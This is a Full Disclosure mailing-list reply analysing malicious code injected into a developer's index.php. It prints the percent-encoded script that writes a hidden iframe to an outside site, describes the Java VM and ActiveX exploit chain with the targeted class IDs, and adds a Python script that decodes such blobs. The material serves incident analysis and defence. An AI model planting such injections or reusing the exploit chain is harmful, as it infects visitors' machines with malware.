Full Disclosure mailing list archives
Re: any idea what is going on here?
From: Andrew Farmer <andfarm () gmail com>
Date: Thu, 4 Jan 2007 15:25:50 -0800
On 04 Jan 07, at 13:37, Ian Shaw wrote:
A website that I am developing has had BackDoor-CUS!php uploaded to the images directory. My fault entirely, due to the permissions set. This has resulted in

    <html> <script language="javascript">
    s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%
    2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%
    67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%
    48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%
    47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%
    44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F
    %22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%
    53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
    document.writeln(s);document.close(); </script> </html>

being added to the top of index.php. Unencoded this reads

    <iframe src="http://www.nownames.org/images/in.php?adv=3" WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto" frameborder="0" NORESIZE>

When I go to this an applet appears to run but I am not sure what it is doing. Closed my browser out of fear. Does anyone know what it is attempting to do?
The iframe source loads an obfuscated Javascript which, when decoded, loads a Java applet and subsequently attempts several exploits.

I have disassembled the Java applet. It contains some obfuscation of its own, defining classes at runtime from inline byte arrays. It appears to exploit the Microsoft Java VM by overloading SecurityClassLoader at runtime.

One is against a number of ActiveX plugins which implement CreateObject or GetObject methods which may be used to create a WScriptShell. The class IDs of the plugins in question are:

    {BD96C556-65A3-11D0-983A-00C04FC29E36}
    {AB9BCEDD-EC7E-47E1-9322-D4A210617116}
    {0006F033-0000-0000-C000-000000000046}
    {0006F03A-0000-0000-C000-000000000046}
    {6e32070a-766d-4ee6-879c-dc1fa91d2fc3}
    {6414512B-B978-451D-A0D8-FCFDF33E833C}
    {7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
    {06723E09-F4C2-43c8-8358-09FCD1DB0766}
    {639F725F-1B2D-4831-A9FD-874847682010}
    {BA018599-1DB3-44f9-83B4-461454C84BF8}
    {D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
    {E8CCCDDF-CA28-496b-B050-6C07C962476B}

If such a plugin is found, the script loads and runs a small Windows executable. I have not fully analyzed this executable, but it appears to be a downloader which is not identified by Kaspersky. It loads a third executable in MS-DOS format from another site. None of my tools can disassemble this, but Kaspersky identifies it as Trojan-Downloader.Win32.Small.avw: *another* loader.

Following this, the decrypted script contains part of another exploit. The exploit is truncated, so I'm not sure exactly what it's targeting. There's a lot of Unicode shellcode escaping going on, but the final "attack" is missing. This may be due to a bug in the decryption routine.

All files are available on request, if anyone's interested in doing some further analysis of their own.

That was fun :)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
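The first triage step in this thread, decoding the unescape() blob and recognising the zero-size iframe it writes, done as a small Python script. This is an added example, not code from either poster; the sample index.php content is constructed from the injected block quoted above (with the archive's line-wrap spaces removed), and the function names are this example's own.

```python
import re

# Constructed sample: the injected block from the post, re-assembled without the
# line-wrap spaces that the mailing-list archive inserted into the hex string.
SAMPLE_INDEX_PHP = (
    '<?php /* site code */ ?>\n<html> <script language="javascript">\n'
    's=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F'
    '%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%67%65%73%2F'
    '%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%48%3D%22%30%25%22'
    '%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%47%49%4E%48%45%49%47%48'
    '%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%44%54%48%3D%22%30%22%20%53%43'
    '%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F%22%20%66%72%61%6D%65%62%6F%72%64'
    '%65%72%3D%22%30%22%20%4E%4F%52%45%53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65'
    '%3E%0A");\ndocument.writeln(s);document.close(); </script> </html>\n'
)

_UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
_ATTR = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def js_unescape(s):
    # Mirror JavaScript's unescape(): %uXXXX is a UTF-16 code unit, %XX a
    # Latin-1 code point. Whitespace is dropped first so wrapped blobs decode.
    s = re.sub(r"\s+", "", s)
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def hidden_iframe_sources(html):
    # Return src of every iframe whose width or height is declared as 0 (or 0%).
    hits = []
    for m in _IFRAME.finditer(html):
        attrs = {}
        for a in _ATTR.finditer(m.group(1)):
            attrs[a.group(1).lower()] = a.group(2) or a.group(3) or a.group(4) or ""
        zero = any(attrs.get(k, "").strip().rstrip("%") == "0" for k in ("width", "height"))
        if zero and attrs.get("src"):
            hits.append(attrs["src"])
    return hits

def triage(page_text):
    # For each unescape("...") call in the page, decode the payload and report
    # any hidden iframes it would write into the document.
    results = []
    for m in _UNESCAPE_CALL.finditer(page_text):
        decoded = js_unescape(m.group(2))
        results.append({"decoded": decoded, "hidden_iframes": hidden_iframe_sources(decoded)})
    return results

if __name__ == "__main__":
    for r in triage(SAMPLE_INDEX_PHP):
        print(r["decoded"].strip(), r["hidden_iframes"])
```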
Current thread:
- any idea what is going on here? Ian Shaw (Jan 04)
- Re: any idea what is going on here? Andrew Farmer (Jan 04)
- Re: any idea what is going on here? ascii (Jan 04)
- Re: any idea what is going on here? Andrew Farmer (Jan 04)